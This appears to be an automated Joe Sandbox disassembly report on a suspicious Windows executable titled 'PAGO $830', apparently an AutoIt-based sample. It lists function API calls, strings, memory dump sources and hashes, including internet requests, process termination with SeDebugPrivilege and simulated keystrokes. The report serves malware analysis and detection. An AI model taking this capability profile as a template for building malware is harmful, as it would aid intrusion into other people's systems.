                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: bbd93f671b620e36af3140a95f2c5aad0c58501dd2b589eead201225badf2827
                                                          • Instruction ID: bb6aea4474a63ca04e7c7f1a2428e61c87431abbb774fb3e28752d08ec01e4e6
                                                          • Opcode Fuzzy Hash: bbd93f671b620e36af3140a95f2c5aad0c58501dd2b589eead201225badf2827
                                                          • Instruction Fuzzy Hash: 57410132B043228B8B248E7DC98543B77E5BFA5714B58452EE882A7784EB30DD09C7B1
                                                          APIs
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 7de25427576141075d27c79ef357ab4721be02adcc09ceea20c7fd404486a8e4
                                                          • Instruction ID: b06a4168580d37d590e8b50ea79b81ca674034274317c7c7a818b54e09a885a2
                                                          • Opcode Fuzzy Hash: 7de25427576141075d27c79ef357ab4721be02adcc09ceea20c7fd404486a8e4
                                                          • Instruction Fuzzy Hash: 7A410232B043229BCB248FADC58543BB7E1BF95714B68452EE885A7745EB30DD49C7B0
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC190
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC1B8
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC1E8
                                                          • GetLastError.KERNEL32 ref: 00DEC240
                                                          • SetEvent.KERNEL32(?), ref: 00DEC254
                                                          • InternetCloseHandle.WININET(00000000), ref: 00DEC25F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 46a502c8b0c722d8026ba96ec943b8544c0c7823129415a85af2e8acdb42ac68
                                                          • Instruction ID: 76b6870ebc5666bb468521d0ca9b932ffabbeb0e7d4900b478a300bb4fe1bd1d
                                                          • Opcode Fuzzy Hash: 46a502c8b0c722d8026ba96ec943b8544c0c7823129415a85af2e8acdb42ac68
                                                          • Instruction Fuzzy Hash: E831C071110344AFD721AFA68C88ABB7BFCEB49740B14561EF546A2200D731ED4A8BB5
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB47E6,?,?,Bad directive syntax error,00E0D0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DD97DA
                                                          • LoadStringW.USER32(00000000,?,00DB47E6,?), ref: 00DD97E1
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DD98A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 858772685-4153970271
                                                          • Opcode ID: 1314fd2abaab4bd8c72560234d969d7aface4646d7690403b7ca4bcab674a529
                                                          • Instruction ID: 0ed621ff9475e62652bb8e434ba87f24e63d47a49523b543920fae3803663b0e
                                                          • Opcode Fuzzy Hash: 1314fd2abaab4bd8c72560234d969d7aface4646d7690403b7ca4bcab674a529
                                                          • Instruction Fuzzy Hash: 97216F3290031AAFCF11AF90CC4AEEE7B35FF14700F048456F559660A2EA729558DB71
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e79b91a15f85091d5dbb36a53c06d5284cb16689fd32c4e9456f46a2ec02406d
                                                          • Instruction ID: fcd666cc0695e7dc1f1eeea45097792faa77dbed18a2e06d5330d1154cb85e93
                                                          • Opcode Fuzzy Hash: e79b91a15f85091d5dbb36a53c06d5284cb16689fd32c4e9456f46a2ec02406d
                                                          • Instruction Fuzzy Hash: 53C10474A04246AFCF11DFA9C840BADBBB1AF1B310F1841A9F954E7392CB348945DB74
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 00D776D0
                                                          • GetWindowRect.USER32(?,?), ref: 00D77711
                                                          • ScreenToClient.USER32(?,?), ref: 00D77739
                                                          • GetClientRect.USER32(?,?), ref: 00D7787D
                                                          • GetWindowRect.USER32(?,?), ref: 00D7789E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 01196586529449604f7411313436a819e107c03e5c54a67535cdbbdb77c35257
                                                          • Instruction ID: 5c57314004d42b8ec8f90d67dbdfe42b8eb7719dd5e9743191ce51eed85ebe05
                                                          • Opcode Fuzzy Hash: 01196586529449604f7411313436a819e107c03e5c54a67535cdbbdb77c35257
                                                          • Instruction Fuzzy Hash: 05C16D7990464AEFDB10CFA9C444BEDB7F1FF08310F18851AE89AA3254E734A991DB61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 1282221369-0
                                                          • Opcode ID: c62d90df102d84464efcd513aefdd405e059a6b0950f27ff9fe375c2a6c6ffa5
                                                          • Instruction ID: 7b3a0423aa6327a07f5d1fa5fdc8138ecaac8aea018a7849dd90a47b2751a266
                                                          • Opcode Fuzzy Hash: c62d90df102d84464efcd513aefdd405e059a6b0950f27ff9fe375c2a6c6ffa5
                                                          • Instruction Fuzzy Hash: 9F612672E04305AFDF21AFB9988167A7BA4EF03730F08416EF955E7281E6319E4587B1
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DC72E3
                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC72FC
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC730C
                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC7324
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC7345
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7354
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC7371
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D8A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00DC7380
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                          • String ID:
                                                          • API String ID: 1268354404-0
                                                          • Opcode ID: 15471342e5dc06ec5646cec8dff221e743947bc531c8b8dabcca5e2afb75609b
                                                          • Instruction ID: 971fbe58a76bf279cec6ae630c0bb6b6a750f60bfd8df7a8383805600b8a2c6e
                                                          • Opcode Fuzzy Hash: 15471342e5dc06ec5646cec8dff221e743947bc531c8b8dabcca5e2afb75609b
                                                          • Instruction Fuzzy Hash: D3519B30600305AFEB20DF69CC45FAA77B5FB48750F244619F952A72E0D771E990DB61
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC0A0
                                                          • GetLastError.KERNEL32 ref: 00DEC0B3
                                                          • SetEvent.KERNEL32(?), ref: 00DEC0C7
                                                            • Part of subcall function 00DEC171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC190
                                                            • Part of subcall function 00DEC171: GetLastError.KERNEL32 ref: 00DEC240
                                                            • Part of subcall function 00DEC171: SetEvent.KERNEL32(?), ref: 00DEC254
                                                            • Part of subcall function 00DEC171: InternetCloseHandle.WININET(00000000), ref: 00DEC25F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 337547030-0
                                                          • Opcode ID: fc86d1edaaf4664375480b9c4cf36d6a15b8e8633b6d4af0acb65316baea09a0
                                                          • Instruction ID: 5551dc2003b601c02498113b3abff4063e2c4ec86ba6fc7320808fef017deda6
                                                          • Opcode Fuzzy Hash: fc86d1edaaf4664375480b9c4cf36d6a15b8e8633b6d4af0acb65316baea09a0
                                                          • Instruction Fuzzy Hash: F831AE71210745AFDB21AFB6CC44AABBBF8FF08700B18551EF95A92611C731E856DBB0
                                                          APIs
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD2501
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DD251F
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DD2523
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD252D
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DD2545
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DD2549
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD2553
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DD2567
                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DD256B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 9260edcd8bd96b930d17f21087a32df45e6988b7b93f6a92ccd575a915c685bb
                                                          • Instruction ID: fa391acd2b8653364d838fa52e19e43b9450a628887b1fc94ad1dde88362225d
                                                          • Opcode Fuzzy Hash: 9260edcd8bd96b930d17f21087a32df45e6988b7b93f6a92ccd575a915c685bb
                                                          • Instruction Fuzzy Hash: 7201D8303902147BFB2067699C8AF557F69DB8EB12F200106F314BF1D1C9E35488CABA
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DD138D,?,?,00000000), ref: 00DD1750
                                                          • HeapAlloc.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1757
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD138D,?,?,00000000), ref: 00DD176C
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00DD138D,?,?,00000000), ref: 00DD1774
                                                          • DuplicateHandle.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1777
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD138D,?,?,00000000), ref: 00DD1787
                                                          • GetCurrentProcess.KERNEL32(00DD138D,00000000,?,00DD138D,?,?,00000000), ref: 00DD178F
                                                          • DuplicateHandle.KERNEL32(00000000,?,00DD138D,?,?,00000000), ref: 00DD1792
                                                          • CreateThread.KERNEL32(00000000,00000000,00DD17B8,00000000,00000000,00000000), ref: 00DD17AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: c7cdb56c859990a646e4cdd9a6b5f9fd6e53925473a88ffe7c297b2d76addbdd
                                                          • Instruction ID: 73c83d573c4904bc38d98b78858532c88d1863f68eec938169ac39b3853f2484
                                                          • Opcode Fuzzy Hash: c7cdb56c859990a646e4cdd9a6b5f9fd6e53925473a88ffe7c297b2d76addbdd
                                                          • Instruction Fuzzy Hash: CF01BF75241304BFE710AB65DC4DF677BACEB89711F104511FA05DB1A2C6759844CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$p
                                                          • API String ID: 2610073882-3481103671
                                                          • Opcode ID: 8b5e07207f40b2483526114e0ab3795e37f9c8de86ff1e2e5b859ab1381ea615
                                                          • Instruction ID: 75909d56e47f4d445e1157390f5738c5aadfa89ca4a4a82c08b6d2c088925d61
                                                          • Opcode Fuzzy Hash: 8b5e07207f40b2483526114e0ab3795e37f9c8de86ff1e2e5b859ab1381ea615
                                                          • Instruction Fuzzy Hash: C1918971A00219ABDF20DFA5C848FEFBBB8EF86714F158559E615AB280D7709944CFB0
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E13720), ref: 00DABB31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E4121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00DABBA9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E41270,000000FF,?,0000003F,00000000,?), ref: 00DABBD6
                                                          • _free.LIBCMT ref: 00DABB1F
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DABCEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: 7$ 7
                                                          • API String ID: 1286116820-2298233292
                                                          • Opcode ID: 159613405475dfe621b75e8addf012ed4e8e857726a32a5de0c4ed3b0904a475
                                                          • Instruction ID: fad606648a57a5d5016a5bfd0f732c4b57e8a494f35eb3956352d4397a5453ec
                                                          • Opcode Fuzzy Hash: 159613405475dfe621b75e8addf012ed4e8e857726a32a5de0c4ed3b0904a475
                                                          • Instruction Fuzzy Hash: E251B771900219AFCB10DF7A9C4196A7BB8EF43370F14429BE450E71A2EB709D869B74
                                                          APIs
                                                            • Part of subcall function 00DDD3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD41F
                                                            • Part of subcall function 00DDD3FA: Process32FirstW.KERNEL32(00000000,?), ref: 00DDD42D
                                                            • Part of subcall function 00DDD3FA: CloseHandle.KERNEL32(00000000), ref: 00DDD4FA
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA094
                                                          • GetLastError.KERNEL32 ref: 00DFA0A7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA0DA
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DFA18F
                                                          • GetLastError.KERNEL32(00000000), ref: 00DFA19A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFA1EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: d26f96c8a9ee8cfe8c64f0637c9d87c2a5e9dd6f5d93fc8908991c25ac3843a6
                                                          • Instruction ID: c7356d7b77b7bddac5c1952f41919c3350324de43bae01150700d946787adcf3
                                                          • Opcode Fuzzy Hash: d26f96c8a9ee8cfe8c64f0637c9d87c2a5e9dd6f5d93fc8908991c25ac3843a6
                                                          • Instruction Fuzzy Hash: 2C617F70208242AFD720DF19C494F25BBA0EF54318F1AC49CE56A4F7A2C776ED45CBA2
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E03858
                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E0386D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E03887
                                                          • _wcslen.LIBCMT ref: 00E038CC
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E038F9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E03927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcslen
                                                          • String ID: SysListView32
                                                          • API String ID: 2147712094-78025650
                                                          • Opcode ID: dbe365c340b3815498c187ccd3363ab4a632b3605f9fb0a26d1c7bef1aa1df47
                                                          • Instruction ID: c42d2be6b1b6a731361478858ecfdec0deda2f7f519064025e0bb5208c787541
                                                          • Opcode Fuzzy Hash: dbe365c340b3815498c187ccd3363ab4a632b3605f9fb0a26d1c7bef1aa1df47
                                                          • Instruction Fuzzy Hash: C841AE71A00319ABEB219F64CC49FEA7BA9FF08754F101166F948F72D1D7719A848BA0
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DDBC1B
                                                          • IsMenu.USER32(00000000), ref: 00DDBC3B
                                                          • CreatePopupMenu.USER32 ref: 00DDBC71
                                                          • GetMenuItemCount.USER32(013958F8), ref: 00DDBCC2
                                                          • InsertMenuItemW.USER32(013958F8,?,00000001,00000030), ref: 00DDBCEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                          • String ID: 0$2
                                                          • API String ID: 93392585-3793063076
